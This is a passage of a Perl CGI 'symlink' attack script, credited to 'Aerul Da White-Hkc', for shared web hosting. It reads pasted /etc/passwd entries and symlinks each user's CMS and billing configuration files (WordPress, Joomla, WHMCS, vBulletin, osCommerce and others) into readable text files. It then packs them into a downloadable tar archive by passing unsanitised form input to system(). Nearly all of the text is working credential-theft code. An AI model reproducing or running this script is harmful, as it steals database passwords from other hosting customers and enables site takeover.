symlink('/home6/'.$user.'/public_html/wordpress/wp-config.php',$kola.' ~~ wordpress - Wordpress.txt');
symlink('/home6/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.' ~~ wordpress - beta - Wordpress.txt');
symlink('/home6/'.$user.'/public_html/news/wp-config.php',$kola.' ~~ news - Wordpress.txt');
symlink('/home6/'.$user.'/public_html/new/wp-config.php',$kola.' ~~ new - Wordpress.txt');
symlink('/home6/'.$user.'/public_html/blogs/wp-config.php',$kola.' ~~ blog - Wordpress.txt');
symlink('/home6/'.$user.'/public_html/home/wp-config.php',$kola.' ~~ home - Wordpress.txt');
symlink('/home6/'.$user.'/public_html/portal/wp-config.php',$kola.' ~~ portal - Wordpres.txt');
symlink('/home6/'.$user.'/public_html/site/wp-config.php',$kola.' ~~ site - Wordpress.txt');
symlink('/home6/'.$user.'/public_html/main/wp-config.php',$kola.' ~~ main - Wordpress.txt');
symlink('/home6/'.$user.'/public_html/test/wp-config.php',$kola.' ~~ test - Wordpress.txt');
symlink('/home6/'.$user.'/public_html/SSI.php',$kola.' ~~ C M F .txt') ; 
symlink('/home6/'.$user.'/public_html/forum/SSI.php',$kola.' ~~ forum - C M F .txt') ; 
symlink('/home6/'.$user.'/public_html/system/sistem.php',$kola.' ~~ Lokomedia.txt'); 
symlink('/home6/'.$user.'/public_html/mk_conf.php',$kola.' ~~ mk-portale1.txt');
symlink('/home6/'.$user.'/public_html/includes/functions.php',$kola.' ~~ hpbb3.txt');
symlink('/home6/'.$user.'/public_html/include/db.php',$kola.' ~~ infinity.txt');
symlink('/home6/'.$user.'/public_html/conf_global.php',$kola.' ~~ invisio.txt');
symlink('/home6/'.$user.'/public_html/admin/config.php',$kola.' ~~ admin - OpenCart-4.txt') ;
symlink('/home7/'.$user.'/public_html/beta/configuration.php',$kola.' ~~ beta - Joomla.txt') ; 
symlink('/home7/'.$user.'/public_html/configuration.php',$kola.' ~~ joomla.txt') ; 
symlink('/home7/'.$user.'/public_html/includes/config.php',$kola.' ~~ vBulletin-2.txt') ; 
symlink('/home7/'.$user.'/public_html/home/configuration.php',$kola.' ~~ home - Joomla.txt') ;
symlink('/home7/'.$user.'/public_html/store/configuration.php',$kola.' ~~ store - Joomla.txt') ;
symlink('/home7/'.$user.'/public_html/joomla/configuration.php',$kola.' ~~ joomla - Joomla.txt');
symlink('/home7/'.$user.'/public_html/portal/configuration.php',$kola.' ~~ portal - Joomla.txt');
symlink('/home7/'.$user.'/public_html/joom/configuration.php',$kola.' ~~ joom - Joomla.txt');
symlink('/home7/'.$user.'/public_html/joo/configuration.php',$kola.' ~~ jom - Joomla.txt');
symlink('/home7/'.$user.'/public_html/cms/configuration.php',$kola.' ~~ cms - Joomla.txt');
symlink('/home7/'.$user.'/public_html/site/configuration.php',$kola.' ~~ site - Joomla.txt');
symlink('/home7/'.$user.'/public_html/main/configuration.php',$kola.' ~~ main - Joomla.txt');
symlink('/home7/'.$user.'/public_html/news/configuration.php',$kola.' ~~ news - Joomla.txt');
symlink('/home7/'.$user.'/public_html/new/configuration.php',$kola.' ~~ new - Joomla.txt');
symlink('/home7/'.$user.'/public_html/home/configuration.php',$kola.' ~~ home - Joomla.txt');
symlink('/home7/'.$user.'/public_html/test/configuration.php',$kola.' ~~ test - Joomla.txt');
symlink('/home7/'.$user.'/public_html/myshop/configuration.php',$kola.' ~~ myshop - Joomla.txt'); 
symlink('/home7/'.$user.'/public_html/Settings.php',$kola.' ~~ Smf.txt'); 
symlink('/home7/'.$user.'/public_html/smf/Settings.php',$kola.' ~~ smf - Smf.txt'); 
symlink('/home7/'.$user.'/public_html/forum/Settings.php',$kola.' ~~ forum - Smf.txt'); 
symlink('/home7/'.$user.'/public_html/forums/Settings.php',$kola.' ~~ forums - Smf.txt'); 
symlink('/home7/'.$user.'/public_html/sites/default/settings.php',$kola.' ~~ sites - default - configuration 3.txt');
symlink('/home7/'.$user.'/public_html/includes/dist-configure.php',$kola.' ~~ Zencart.txt'); 
symlink('/home7/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.' ~~ zencart - zencart.txt'); 
symlink('/home7/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.' ~~ shop - zencart.txt'); 
symlink('/home7/'.$user.'/public_html/includes/configure.php',$kola.' ~~ Oscommerce.txt');
symlink('/home7/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.' ~~ oscommerce - Oscommerce.txt');
symlink('/home7/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.' ~~ oscommerces -Oscommerces.txt');
symlink('/home7/'.$user.'/public_html/shopping/includes/configure.php',$kola.' ~~ shopping - Shopping.txt');
symlink('/home7/'.$user.'/public_html/sale/includes/configure.php',$kola.' ~~ sale - Oscommerce.txt');
symlink('/home7/'.$user.'/public_html/store/includes/configure.php',$kola.' ~~ store - Oscommerce.txt');
symlink('/home7/'.$user.'/public_html/inc/config.php',$kola.' ~~ MyBB.txt') ;
symlink('/home7/'.$user.'/public_html/forum/inc/config.php',$kola.' ~~ forum - MyBB .txt') ;
symlink('/home7/'.$user.'/public_html/lib/config.php',$kola.' ~~ Balitbang.txt') ; 
symlink('/home7/'.$user.'/public_html/cc/includes/config.php',$kola.' ~~ VBulletin4.txt');
symlink('/home7/'.$user.'/public_html/forum/includes/config.php',$kola.' ~~ forum - vBulletin.txt');
symlink('/home7/'.$user.'/public_html/forum/config.php',$kola.' ~~ forum - PhpBB.txt') ;
symlink('/home7/'.$user.'/public_html/amember/config.inc.php',$kola.' ~~ Amember.txt');
symlink('/home7/'.$user.'/public_html/config.inc.php',$kola.' ~~ Amember2.txt');
symlink('/home7/'.$user.'/public_html/vb/includes/config.php',$kola.' ~~ Vb.txt');
symlink('/home7/'.$user.'/public_html/vb3/includes/config.php',$kola.' ~~ Vb3.txt');
symlink('/home7/'.$user.'/public_html/upload/includes/config.php',$kola.' ~~ Upload.txt');
symlink('/home7/'.$user.'/public_html/incl/config.php',$kola.' ~~ Malay.txt');
symlink('/home7/'.$user.'/public_html/config/koneksi.php',$kola.' ~~ Lokomedia.txt');
symlink('/home7/'.$user.'/public_html/config/config.php',$kola.' ~~ config.txt');
symlink('/home7/'.$user.'/public_html/datas/config.php',$kola.' ~~ datas - configuration 3.txt');
symlink('/home7/'.$user.'/public_html/forum/conf/config.php',$kola.' ~~ forum - Other-1.txt') ; 
symlink('/home7/'.$user.'/public_html/include/config.php',$kola.' ~~ Other-2.txt');
symlink('/home7/'.$user.'/public_html/config.php',$kola.' ~~ Other-3.txt') ;
symlink('/home7/'.$user.'/public_html/admin/conf.php',$kola.' ~~ admin - Other-4.txt');
symlink('/home7/'.$user.'/public_html/connect.php',$kola.' ~~ Other-5.txt');
symlink('/home7/'.$user.'/public_html/codelibrary/inc/variables.php',$kola.' ~~ Other-6.txt') ;
symlink('/home7/'.$user.'/public_html/client/configuration.php',$kola.' ~~ client - admin Whm1.txt') ; 
symlink('/home7/'.$user.'/public_html/clients/configuration.php',$kola.' ~~ clients - Whm2.txt') ; 
symlink('/home7/'.$user.'/public_html/billing/configuration.php',$kola.' ~~ billing - Whm3.txt') ; 
symlink('/home7/'.$user.'/public_html/billings/configuration.php',$kola.' ~~ Whm4.txt') ;
symlink('/home7/'.$user.'/public_html/whmcs/configuration.php',$kola.' ~~ whmcs - Whm5.txt') ; 
symlink('/home7/'.$user.'/public_html/whm/configuration.php',$kola.' ~~ whm - Whm6.txt');
symlink('/home7/'.$user.'/public_html/order/configuration.php',$kola.' ~~ order - Whm7.txt');
symlink('/home7/'.$user.'/public_html/whmc/configuration.php',$kola.' ~~ whmc - Whm8.txt');
symlink('/home7/'.$user.'/public_html/submitticket.php',$kola.' ~~ whm9.txt');
symlink('/home7/'.$user.'/public_html/manage/configuration.php',$kola.' ~~ manage -Whm10.txt'); 
symlink('/home7/'.$user.'/public_html/clientes/configuration.php',$kola.' ~~ clientes - Whm11.txt');
symlink('/home7/'.$user.'/public_html/cliente/configuration.php',$kola.' ~~ cliente - Whm12txt');
symlink('/home7/'.$user.'/public_html/clientsupport/configuration.php',$kola.' ~~ clientsupport - Whm13.txt');
symlink('/home7/'.$user.'/public_html/support/configuration.php',$kola.' ~~ support - Whm13.txt');
symlink('/home7/'.$user.'/public_html/supports/configuration.php',$kola.' ~~ supports - Whm14.txt');
symlink('/home7/'.$user.'/public_html/cpanel/configuration.php',$kola.' ~~ cpanel - Whm15');
symlink('/home7/'.$user.'/public_html/panel/configuration.php',$kola.' ~~ panel - Whm16');
symlink('/home7/'.$user.'/public_html/host/configuration.php',$kola.' ~~ host - Whm17');
symlink('/home7/'.$user.'/public_html/hosting/configuration.php',$kola.' ~~ hosting - Whm18');
symlink('/home7/'.$user.'/public_html/hosts/configuration.php',$kola.' ~~ hosts - Whm19');
symlink('/home7/'.$user.'/public_html/v1/configuration.php',$kola.' ~~ v1 - Whm20');
symlink('/home7/'.$user.'/public_html/v2/configuration.php',$kola.' ~~ v2 - Whm21');
symlink('/home7/'.$user.'/public_html/baru/configuration.php',$kola.' ~~ v2 - Whm22');
symlink('/home7/'.$user.'/public_html/wp-config.php',$kola.' ~~ Wordpress.txt') ; 
symlink('/home7/'.$user.'/public_html/blog/wp-config.php',$kola.' ~~ Wordpress.txt') ; 
symlink('/home7/'.$user.'/public_html/Connections/cms_blog.php',$kola.' ~~ admin - cms_blog.txt') ; 
symlink('/home7/'.$user.'/public_html/web/wp-config.php',$kola.' ~~ web - Wordpress .txt') ; 
symlink('/home7/'.$user.'/public_html/welcome/wp-config.php',$kola.' ~~ welcome - Wordpress .txt') ; 
symlink('/home7/'.$user.'/public_html/store/wp-config.php',$kola.' ~~ store - Wordpress .txt') ; 
symlink('/home7/'.$user.'/public_html/wp/wp-config.php',$kola.' ~~ wp - Wordpress.txt');
symlink('/home7/'.$user.'/public_html/wp/beta/wp-config.php',$kola.' ~~ wp - beta - Wordpress.txt');
symlink('/home7/'.$user.'/public_html/beta/wp-config.php',$kola.' ~~ beta - Wordpress.txt');
symlink('/home7/'.$user.'/public_html/press/wp-config.php',$kola.' ~~ press - Wp13.txt');
symlink('/home7/'.$user.'/public_html/wordpress/wp-config.php',$kola.' ~~ wordpress - Wordpress.txt');
symlink('/home7/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.' ~~ wordpress - beta - Wordpress.txt');
symlink('/home7/'.$user.'/public_html/news/wp-config.php',$kola.' ~~ news - Wordpress.txt');
symlink('/home7/'.$user.'/public_html/new/wp-config.php',$kola.' ~~ new - Wordpress.txt');
symlink('/home7/'.$user.'/public_html/blogs/wp-config.php',$kola.' ~~ blog - Wordpress.txt');
symlink('/home7/'.$user.'/public_html/home/wp-config.php',$kola.' ~~ home - Wordpress.txt');
symlink('/home7/'.$user.'/public_html/portal/wp-config.php',$kola.' ~~ portal - Wordpres.txt');
symlink('/home7/'.$user.'/public_html/site/wp-config.php',$kola.' ~~ site - Wordpress.txt');
symlink('/home7/'.$user.'/public_html/main/wp-config.php',$kola.' ~~ main - Wordpress.txt');
symlink('/home7/'.$user.'/public_html/test/wp-config.php',$kola.' ~~ test - Wordpress.txt');
symlink('/home7/'.$user.'/public_html/SSI.php',$kola.' ~~ C M F .txt') ; 
symlink('/home7/'.$user.'/public_html/forum/SSI.php',$kola.' ~~ forum - C M F .txt') ; 
symlink('/home7/'.$user.'/public_html/system/sistem.php',$kola.' ~~ Lokomedia.txt'); 
symlink('/home7/'.$user.'/public_html/mk_conf.php',$kola.' ~~ mk-portale1.txt');
symlink('/home7/'.$user.'/public_html/includes/functions.php',$kola.' ~~ hpbb3.txt');
symlink('/home7/'.$user.'/public_html/include/db.php',$kola.' ~~ infinity.txt');
symlink('/home7/'.$user.'/public_html/conf_global.php',$kola.' ~~ invisio.txt');
symlink('/home7/'.$user.'/public_html/admin/config.php',$kola.' ~~ admin - OpenCart-4.txt') ;
}
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
  read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
} else {
  $buffer = $ENV{'QUERY_STRING'};
}
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
  ($name, $value) = split(/=/, $pair);
  $name =~ tr/+/ /;
  $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  $value =~ tr/+/ /;
  $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  $FORM{$name} = $value;
}
if ($FORM{pass} eq ""){
print '
<body class="newStyle1" bgcolor="#000000">
<p>Symlink Script To Get All Config Files </p>
<p><font color="#C0C0C0">[</font> By <font color="#FF0000">Aerul Da White-Hkc</font><font color="#C0C0C0">]</font>
<form method="post">
<textarea name="pass" style="border:1px dotted #FF0000; width: 543px; height: 420px; background-color:#0C0C0C; font-family:Tahoma; font-size:8pt; color:#FF0000"  ></textarea></p>
<p align="center">
<input name="tar" type="text" style="border:1px dotted #FF0000; width: 212px; background-color:#0C0C0C; font-family:Tahoma; font-size:8pt; color:#FF0000; "  /></p>
<p align="center">
<input name="Submit1" type="submit" value="GET CONFIG !" style="border:1px dotted #FF0000; width: 99; font-family:Tahoma; font-size:10pt; color:#59E817; text-transform:uppercase; height:23; background-color:#0C0C0C" /></p>
</form>';
}else{
@lines =<$FORM{pass}>;
$y = @lines;
open (MYFILE, ">tar.tmp");
print MYFILE "tar -czf ".$FORM{tar}.".tar ";
for ($ka=0;$ka<$y;$ka++){
while(@lines[$ka]  =~ m/(.*?):x:/g){
&lil($1);
print MYFILE $1.".txt ";
for($kd=1;$kd<18;$kd++){
print MYFILE $1.$kd.".txt ";
}
}
 }
print'<body class="newStyle1" bgcolor="#000000">
<p>You got it!!<br><br><br><font color="#C0C0C0">[</font> Coded By <font color="#FF0000">Aerul Da White-Hkc</font><font color="#C0C0C0">]</font></p>
<p>&nbsp;</p>';
if($FORM{tar} ne ""){
open(INFO, "tar.tmp");
@lines =<INFO> ;
close(INFO);
system(@lines);
print'<p><a href="'.$FORM{tar}.'.tar"><font color="#00FF00">
<span style="text-decoration: none">Click Here To Download Tar File</span></font></a></p>';
print'<p><a href="terjang" <font color="#00FF00">
<span style="text-decoration: none">=>Korban Galau</span></font></a></p>';
}
}
 print"
 </body>
</html>";